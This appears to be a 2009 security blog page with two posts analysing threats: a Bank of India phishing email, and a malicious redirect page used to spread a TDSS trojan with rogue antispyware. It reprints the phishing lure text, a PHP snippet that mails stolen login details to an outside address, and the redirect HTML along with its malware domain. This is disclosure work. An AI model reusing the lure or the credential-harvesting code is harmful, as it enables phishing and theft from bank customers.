Saturday, October 31, 2009

Bank Of India – Phish

With long list of Indian Phishing Bank site , now there is raise of Phishing for “Bank Of India”

Here is mail received with intention to phish

 

Dear Customer,
Bank of India is constantly striving to provide you with more convenience, control, and security to assist in managing your finances.
As part of our ongoing efforts to make it easier and more secure for you to use our online services, we have upgraded to Consent and 
Online Access that you reviewed and accepted when you began-to use Bank of India Online® Banking service(s). 
To upgrade your Information, please visit our secure server webform by clicking the link below...
Upgrade My Account Security.
This alert relates to your Online Banking Profile only.

 

Upgrade My Account Security Links to Following hacked site

harveys.ie/images/inet/boi/BankAwayRetail.html

bank_phish

this site reads and sends the account information to an gmail id using a PHP file.

$recipient = "xxxxxx@gmail.com";
$subject = "boi login";
$headers = "BOI@boi.co.in";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
     
if (mail($recipient,$subject,$message,$headers))
       {
           header("Location: http://www.bankofindia.com/");

       }
else
           {
         echo "ERROR! Please go back and try again.";
         }

at No comments:

More Rouge from Genuine Site

This has become most common infection these days , Rouge Antispyware.Way they spread has varied from Fake codec to Link to a Genuine site with page linked to malicious site.

Here in our case this was a mail send from a hacked yahoo account with link to Hindu Temple Site.

 

hxxp://www.shrikhatushyamji.com/Wvse2KU8VD.html

this page contains the malicious link

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>CONGRATULATIONS</title>
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("http://vivilan.cn");
//-->
</script>
<noscript>
<meta http-equiv="Refresh" content="0; URL=http://vivilan.cn"> 
</noscript>
</head>
<body>
<a href="http://vivilan.cn">Click here...</a>
</body>
</html>




From this site it downloads Surprise.exe – Trojan.TDSS–


This install Rouge Antispyware as an Payload.



at No comments:
Subscribe to: Posts (Atom)

APK spam on Whatsapp Targeting Bank users

  Initial vector:   Whatsapp spam user posing as union bank with logo in user profile shared apk file named as “Union Bank Aadhaar Update....